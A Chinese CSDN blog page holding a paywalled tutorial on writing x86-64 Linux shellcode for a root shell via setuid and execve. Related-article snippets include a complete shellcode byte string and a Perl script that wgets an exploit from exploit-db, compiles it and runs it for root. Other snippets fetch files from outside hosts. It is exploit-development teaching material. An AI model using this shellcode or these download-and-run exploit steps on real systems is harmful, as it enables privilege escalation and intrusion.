linux x64 shellcode,栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(二)shellcode...

最新推荐文章于 2024-08-14 11:41:39 发布
最新推荐文章于 2024-08-14 11:41:39 发布
阅读量531 收藏 2
点赞数
文章标签: linux x64 shellcode
本文介绍了如何在Linux x64环境下编写和使用Shellcode来获得root权限。通过理解shellcode的工作原理,利用汇编代码和系统调用来实现。示例展示了从C代码到汇编再到Shellcode的转换过程,并最终成功执行shell。
摘要由CSDN通过智能技术生成

shellcode 是一组指令opcode, 是可以被程序运行,因为shellcode是要直接操作寄存器和函数,所以opcode 必须是十六进制的形式。

既然是攻击,那shellcode 主要的目的是调用系统函数,而在x86下 在linux下有两种方式。

第一种是通过直接调用中断 int 0x80进入内核态,从而达到调用目的。

第二种是通过调用libc里syscall(64位)和sysenter(32位)

而目前在64位linux中推荐使用syscall,因为opcode是16进制的指令集合,可以通过先出汇编代码,然后编译成执行代码,最后查看opcode.

既然我们是想获得root权限,而且能够继续执行shell, 那么我们通常会使用下面代码(先不讨论linux相关的知识)。

shell.c

#include

int main(){

setuid(0);

execve("/bin/sh",NULL,NULL);

}而所对应的汇编代码如下

global _start

_start:

xor rdi,rdi

xor rax,rax

mov al,0x69

syscall

xor rdx, rdx

mov rbx, 0x68732f6e69622fff

shr rbx, 0x8

push rbx

mov rdi, rsp

xor rax, rax

push rax

push rdi

mov rsi, rsp

mov al, 0x3b

最低0.47元/天 解锁文章
王杰森
关注
栈溢出攻击提权进入root shell
lyx2007825的专栏
11-11 4339
以前对栈溢出攻击只是一种感官上的,最近学了shellcode,决ding
软件安全实验——lab4(格式化字符串2:修改内存地址运行shellcode获取root权限
Onlyone_1314的博客
07-21 1096
目录标题一、获得环境变量的程序和攻击的程序的文件名长度不一样(1)定义一个环境变量EGG存放shellcode(2)获取shellcode的地址(3)查找exit函数的地址(4)1、用%x找到printf()中参数在栈中的位置是11(5)将exit函数的地址修改为shellcode的地址、令两个程序的文件名长度相等(推荐)(1)定义一个环境变量EGG存放shellcode(2)获取shellcode的地址(3)攻击三、Root权限开启alsr:sudo sysctl -w kernel.randomize
(shellcode注入攻击)ret2shellcode-栈上的ret2shellcode
最新发布
2401_83500274的博客
08-14 287
用64ida打开发现如下情况,他输出了v4的地址,然后shift+F12没有发现什么后面函数和bin/sh字样,所以我们可以考虑用栈上的ret2shellcode来写。v4_addr = int(r.recvline()[33:-1],16)#这里接受的是printf里的,并且进行了切片操作,使得位v4地址并且转换为10进制。ret2shellcode的题,大致为bss段上的和栈上的shellcode。生成64位shellcode,接收v4的地址,利用ljust覆盖填充,返回v4的地址。
Linux因15年前的内核漏洞被获得 Root 权限
llawliet0001的专栏
03-28 174
导读 近日,在Linux内核的 iSCSI 子系统中发现的三个漏洞可能会允许具有基本用户权限的本地攻击者在未打补丁的 Linux 系统上获得 root 权限。 这些安全漏洞只能在本地被利用,这意味着潜在的攻击者将不得不通过利用另一个漏洞或使用其他攻击载体来访问受影响的设备。 15年之久的 Linux 内核漏洞 这些漏洞在 2006年 iSCSI 内核子系统的初始开发阶段就被引入,如今时隔 15 年,GRIMM 的研究人员终于发现了这些漏洞。 根据 GRIMM 安全研究员 Adam N..
栈溢出攻击系列shellcodelinux x86 64位攻击获得root权限(七)利用寄存器攻击
沧海一粟
02-23 3346
栈溢出攻击系列shellcodelinux x86 64位攻击获得root权限(七)利用寄存器攻击
linux环境weblogic栈溢出,栈溢出攻击系列shellcodelinux x86 64位攻击获得root权限(...
weixin_30245667的博客
05-16 217
栈溢出攻击系列shellcodelinux x86 64位攻击获得root权限(一)函数如何执行栈溢出网上已经有很多的例子了,但是很少会涉及到在64位的和操作系统linux相关的,而最近刚好在一直研究这个,所以写着一系列博文,一来是为了帮助自己记忆,来也是为了更多的大家互相探讨。寄存器X86-64有16个64位寄存器,分别是:%rax,%rbx,%rcx,%rdx,%esi,%edi,%rb...
Android系统shellcode编写.zip_android_shellcode
09-23
1. **权限限制**:Android系统采用了安全模型,如Linux的用户权限和SELinux,使得在非root环境下执行shellcode变得更加困难。攻击者需要找到绕过这些限制的方法,例如利用系统漏洞提升权限。 2. **内存布局**:与PC...
linux x86_64 缓冲区溢出分析 以及 shellcode简介
shuimuyq的专栏
01-15 1868
/* buger.c */ #include #include #include int main(void) { char buffer[128] = {0}; char *envp = NULL; printf("buffer address is: %p\n", &buffer); envp = getenv("KIRIKA"); if (envp) strcpy
初识Linux栈溢出攻击
popvip44的博客
10-21 954
初识Linux栈溢出攻击0x00 限定条件1、关闭aslr(Address Space Layout Randomization)   开启aslr后,应用程序或动态链接库装载时,系统会随机设定其装载基址。这样就避免了攻击者事先预知特定函数的入口地址。ubuntu下的关闭命令为echo 0 >/proc/sys/kernel/randomize_va_space,该命令需要事先通过su提升到root
Linux日志保护机制,解读Linux安全机制之栈溢出保护
weixin_42407606的博客
05-06 1320
解读Linux安全机制之栈溢出保护0x00 概述栈溢出保护是一种缓冲区溢出攻击缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让shellcode能够得到执行。当启用栈保护后,函数开始执行的时候会先往栈里插入cookie信息,当函数真正返回的时候会验证cookie信息是否合法,如果不合法就停止程序运行。攻击者在覆盖返回地址的时候往往也会将cookie信息给覆盖掉,导致栈保护...
linux权限溢出,linux本地自动溢出获取root权限工具
weixin_32563411的博客
05-01 134
脚本内容如下:#!/usr/bin/perl# linux本地自动溢出获取root权限工具# chmod 777 getroot.pl# ./getroot.pl{system("wget -O 15704 http://www.exploit-db.com/download/15704");system("gcc -w 15704.c -o 15704");system("chmod 777 1...
linux本地自动溢出获取root权限工具
瞎几把学
11-26 1241
清理了一些连接因为不能访问,或者清除了我的连接的。。。。。留言的连接我已经做好了! 下面应该是是某个国外黑客溢出用的 http://safilooptics.ge/tmp/aa.txt   [python] view plaincopyprint? {  system("wget http://standproje.com/modules/mod_footer/
ShellCode注入
南宫封清的博客
05-03 1474
注意点: 1. 不能有全局变量 2. 不能使用常量字符串 ,可以使用这种形式 szTitle = {'a', 'b', 'c', 0}; 3. 不能使用系统调用,比如不能直接使用MessageBox,因为生成的汇编是 Call [0xxxxxx],这个0xxxxx是导入表的地址,注入的程序导入表地址不同而且导入表中不一定有这个函数,可以使用LoadLibrary配合GetProcAddres...
栈溢出攻击1——注入shellcode指令拿到shell
学习记录
09-15 2101
  在IDA的Function name这一栏里面,如下图所示,没有发现后门函数,说明这道题目需要自己写shellcode来拿到shell权限。 查看sub_80484E9函数的伪代码,如下所示。 int sub_80484E9() { char v1; // [esp+0h] [ebp-28h] puts("Could I know your name?"); myRead((int)&unk_804A060, 32); printf("Hi, %s.\n", &unk
Linux 64位 shellcode
weixin_44442852的博客
10-20 1450
linux exec /bin/sh unsigned char code[] = "\x6a\x3b\x58\x99\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48" "\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f" "\x05"; int main(int argc, ch...
Linuxshellcode注入的方法,linux shellcode技术.pdf
weixin_39626089的博客
05-13 318
linux shellcode技术第9章 Linux shellcode技术中国科学技术大学曾凡平billzeng@ustc.edu.cnLinux shellcode技术• 缓冲区溢出攻击面临的3个问题:(1)返回地址在攻击串的位置;(2)返回地址的值;(3)编写shellcode 。• 编写shellcode要用到汇编语言。x86 的汇编语法常见的有AT&T 和Intel 。• Lin...
linux内核溢出利用,利用Linux内核本地漏洞解决root密码忘记
weixin_28755331的博客
05-13 180
回家期间,同事说有台服务器的root密码不对了,无法通过su - root切换到root,问我如何解决。服务器环境:CentOS 6.3 x86_64 定制版默认登录:服务器添加了普通用户master用于remote ssh login,默认root是禁止直接remote ssh login的,只能通过master登录后,通过su来切换编译环境:gcc 4.4.6在网上查看了下Linux的本地溢出...
Linuxshellcode的编写
weixin_30387663的博客
04-30 750
Linuxshellcode的编写 来源https://xz.aliyun.com/t/2052 EdvisonV/2018-02-14 22:00:42/浏览数 6638技术文章技术文章 0x01 理解系统调用 shellcode是一组可注入的指令,可以在被攻击的程序中运行。由于shellcode要直接操作寄存器和函数,所以必须是十六进制的形式。那么为什么要写sh...
64位Linux栈溢出原理与利用示例
本文主要探讨了在64位Linux系统环境下发生的栈溢出攻击,由作者Mr.Un1k0d3rRingZer0Team撰写,旨在帮助读者理解64位系统下栈溢出攻击的基本原理和技术细节。文章首先解释了x86x86_64架构之间的关键区别,重点提到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值